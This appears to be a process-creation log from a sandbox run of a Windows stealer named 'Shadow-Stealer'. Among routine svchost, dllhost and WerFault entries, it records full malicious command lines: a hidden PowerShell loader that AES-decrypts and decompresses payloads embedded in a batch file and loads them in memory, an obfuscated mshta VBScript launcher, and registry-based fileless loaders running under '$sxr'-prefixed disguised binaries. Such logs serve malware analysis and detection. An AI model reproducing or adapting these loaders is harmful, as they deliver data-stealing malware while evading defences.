C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5b0b2b69-7264-4637-9a9f-641bccea46a2}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{90a5ed3d-9d35-4845-ad94-9792d6a8b103}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{34da9efd-bc13-45a5-9d1a-5be862586030}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{be0e7d18-2e6c-4e3a-90c8-b7afba5aa508}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3376).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5194bba6-089c-407d-961a-c0a6163ad991}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{96c33985-81e6-4e05-9bbe-da1980776803}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{159c1918-d815-4e9a-b657-4504d0c9c6b0}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{dde74d24-75e2-4b87-92ce-3f3e0102344f}

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2892 -ip 2892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 156

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{7614eb74-0942-4b90-9c42-88b23fff0a53}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{bf6b6f95-deda-4803-b2a0-5aa1592b2deb}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5480 -ip 5480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 476

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{8f615197-7f83-426f-bcb7-797e9a5d7bcc}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{ca3d5849-971f-46fa-b6ea-8e33e4c20a40}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{40d50a0c-a320-4ac2-a877-2d461bbf1d53}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{ad978389-d6e9-450a-b0c6-360a9b71acf8}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{56fef73a-7b3e-41cb-9dec-bc3ea2609aac}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{e33ab120-c4f4-44f4-b064-46101783cf7a}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{980745c6-a03c-4fd2-b338-9772e64035ba}

C:\Windows\SysWOW64\WerFault.exe

